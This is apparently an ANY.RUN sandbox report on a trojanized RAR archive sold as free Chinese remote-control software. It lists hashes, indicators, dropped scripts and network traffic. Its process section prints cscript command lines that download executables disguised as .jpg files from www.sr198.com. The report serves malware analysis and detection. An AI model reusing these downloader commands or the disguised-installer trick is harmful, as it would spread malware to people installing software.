File name:

网络人远程控制软件 V7.025 免费远程控制软件.rar

Full analysis: https://app.any.run/tasks/a28dc3d1-000c-44e4-b979-31015dc4c3c8
Verdict: Malicious activity
Analysis date: February 10, 2024, 15:57:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v4, os: Win32
MD5:

BC62F2728FFEC1C5CCAE7FFC8557D133

SHA1:

819C7297DE63B0A79B2819D34CC782B5581ED2EC

SHA256:

1678AC7214AC1E25FDD8D91CEFF670637D9CB52F09EAF838834BE88392703595

SSDEEP:

49152:WWpqU2Ob8SL4GW6NxwhQAF/dhOhOliMHDjfkR1GBvPsUncptCG2EabjAFPfmMsRN:p9x94zixDu/dhdjHsR1GpPs1i3bMPeCa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
      • WinRAR.exe (PID: 3672)
    • Opens an HTTP connection (SCRIPT)

      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 2648)
      • cscript.exe (PID: 1772)
      • cscript.exe (PID: 3224)
    • Creates internet connection object (SCRIPT)

      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 2648)
      • cscript.exe (PID: 1772)
      • cscript.exe (PID: 3224)
    • Sends HTTP request (SCRIPT)

      • cscript.exe (PID: 2648)
      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 1772)
      • cscript.exe (PID: 3224)
    • Unusual connection from system programs

      • cscript.exe (PID: 2648)
      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 1772)
      • cscript.exe (PID: 3224)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
    • The process executes VB scripts

      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
      • q.exe (PID: 2488)
      • cmd.exe (PID: 4008)
      • cmd.exe (PID: 880)
    • Reads security settings of Internet Explorer

      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
      • q.exe (PID: 2488)
    • Reads the Internet Settings

      • wscript.exe (PID: 864)
      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 2648)
      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
      • q.exe (PID: 2488)
      • wscript.exe (PID: 980)
      • cscript.exe (PID: 1772)
      • cmd.exe (PID: 4008)
      • cscript.exe (PID: 3224)
      • cmd.exe (PID: 880)
    • Process requests binary or script from the Internet

      • cscript.exe (PID: 2648)
      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 1772)
      • cscript.exe (PID: 3224)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 864)
      • wscript.exe (PID: 980)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 864)
      • wscript.exe (PID: 980)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 864)
      • wscript.exe (PID: 980)
  • INFO

    • Manual execution by a user

      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
      • q.exe (PID: 2488)
    • Checks supported languages

      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
      • q.exe (PID: 2488)
    • Reads the computer name

      • 网络人远程控制软件 V7.025 免费远程控制软件.exe (PID: 3460)
      • q.exe (PID: 2488)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3672)
    • Reads security settings of Internet Explorer

      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 2648)
      • cscript.exe (PID: 1772)
      • cscript.exe (PID: 3224)
    • Checks proxy server information

      • cscript.exe (PID: 1972)
      • cscript.exe (PID: 2648)
      • cscript.exe (PID: 3224)
      • cscript.exe (PID: 1772)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)

EXIF

ZIP

CompressedSize: 1111703
UncompressedSize: 1202574
OperatingSystem: Win32
ModifyDate: 2013:04:07 23:53:22
PackingMethod: Normal
ArchivedFileName: ??????Զ?̿??????? V7.025 ????Զ?̿???????.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
13
Malicious processes
10
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe 网络人远程控制软件 v7.025 免费远程控制软件.exe wscript.exe no specs cmd.exe no specs cscript.exe cscript.exe wscript.exe no specs q.exe wscript.exe no specs cmd.exe no specs cscript.exe cscript.exe wscript.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
864"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\2345.vbs" C:\Windows\System32\wscript.exe网络人远程控制软件 V7.025 免费远程控制软件.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
880"C:\Windows\System32\cmd.exe" /c 2345.batC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
980"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\2345.vbs" C:\Windows\System32\wscript.exeq.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1772cscript -nologo -e:jscript "C:\Users\admin\Desktop\2345.bat" "http://www.sr198.com/2345pack_ktykj_v3.2.exe.jpg" "c:\2345pack_ktykj_v3.2.exe"C:\Windows\System32\cscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\cscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
1972cscript -nologo -e:jscript "C:\Users\admin\Desktop\2345.bat" "http://www.sr198.com/QQExltele.exe.jpg" "c:\qqexltele.exe"C:\Windows\System32\cscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\cscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
2488"C:\Users\admin\Desktop\q.exe" C:\Users\admin\Desktop\q.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\q.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2620"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\sleep80000.vbs" C:\Windows\System32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2648cscript -nologo -e:jscript "C:\Users\admin\Desktop\2345.bat" "http://www.sr198.com/2345pack_ktykj_v3.2.exe.jpg" "c:\2345pack_ktykj_v3.2.exe"C:\Windows\System32\cscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\cscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3224cscript -nologo -e:jscript "C:\Users\admin\Desktop\2345.bat" "http://www.sr198.com/QQExltele.exe.jpg" "c:\qqexltele.exe"C:\Windows\System32\cscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\cscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3460"C:\Users\admin\Desktop\网络人远程控制软件 V7.025 免费远程控制软件.exe" C:\Users\admin\Desktop\网络人远程控制软件 V7.025 免费远程控制软件.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\网络人远程控制软件 v7.025 免费远程控制软件.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
14 911
Read events
14 706
Write events
175
Delete events
30

Modification events

(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3672) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\网络人远程控制软件 V7.025 免费远程控制软件.rar
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
2
Suspicious files
0
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
3460网络人远程控制软件 V7.025 免费远程控制软件.exeC:\Users\admin\Desktop\2345.battext
MD5:9B7D020028A5BA237400A8FCE24AD5F9
SHA256:BC6F2D100E80802D0D30E2192811723BA2F553CE22B6A27FBD71E260C9BD3B56
3460网络人远程控制软件 V7.025 免费远程控制软件.exeC:\Users\admin\Desktop\网络人远程控制软件V7.025.exeexecutable
MD5:05981225CA62B9EB31A43B83EC20ADBE
SHA256:1534D253B99CCD1D339707E0A878FF8C76E49AEC241BC01F4636CF0C7EA45DAF
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3672.16695\网络人远程控制软件 V7.025 免费远程控制软件.exeexecutable
MD5:2C9F592E2587844AF8CA006B053FE1B1
SHA256:188D1CD3B7A20D0BC7343D712D6AA0E3C56C24B508C8A9DC83C5F46835B9DB1A
3460网络人远程控制软件 V7.025 免费远程控制软件.exeC:\Users\admin\Desktop\2345.vbstext
MD5:76E431B45A53D5E465DF828A0D95E974
SHA256:2B97A36B580883357D53A2C99ECB55C8184EE6028186D919DFB023B81B936C87
4008cmd.exeC:\Users\admin\AppData\Local\Temp\sleep80000.vbstext
MD5:5E95DB5BC9AAE3E6F82542BD29B9798C
SHA256:F2C5BB53476E547566E1C3570921721B3D157BB06FD7337FF9E9DBE1DC0C09D3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
8
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2648
cscript.exe
GET
302
219.234.20.195:80
http://www.sr198.com/2345pack_ktykj_v3.2.exe.jpg
unknown
html
142 b
unknown
1972
cscript.exe
GET
302
219.234.20.195:80
http://www.sr198.com/qqexltele.exe.jpg
unknown
html
142 b
unknown
1772
cscript.exe
GET
302
219.234.20.195:80
http://www.sr198.com/2345pack_ktykj_v3.2.exe.jpg
unknown
html
142 b
unknown
3224
cscript.exe
GET
302
219.234.20.195:80
http://www.sr198.com/qqexltele.exe.jpg
unknown
html
142 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
2648
cscript.exe
219.234.20.195:80
www.sr198.com
West263 International Limited
CN
unknown
1972
cscript.exe
219.234.20.195:80
www.sr198.com
West263 International Limited
CN
unknown
1772
cscript.exe
219.234.20.195:80
www.sr198.com
West263 International Limited
CN
unknown
1772
cscript.exe
118.123.16.4:80
www-x-sr198-x-com.img.addlink.cn
Chinanet
CN
unknown
3224
cscript.exe
219.234.20.195:80
www.sr198.com
West263 International Limited
CN
unknown

DNS requests

Domain
IP
Reputation
www.sr198.com
  • 219.234.20.195
unknown
www-x-sr198-x-com.img.addlink.cn
  • 118.123.16.4
  • 118.123.16.159
  • 60.247.153.76
  • 118.123.16.3
unknown

Threats

No threats detected
No debug info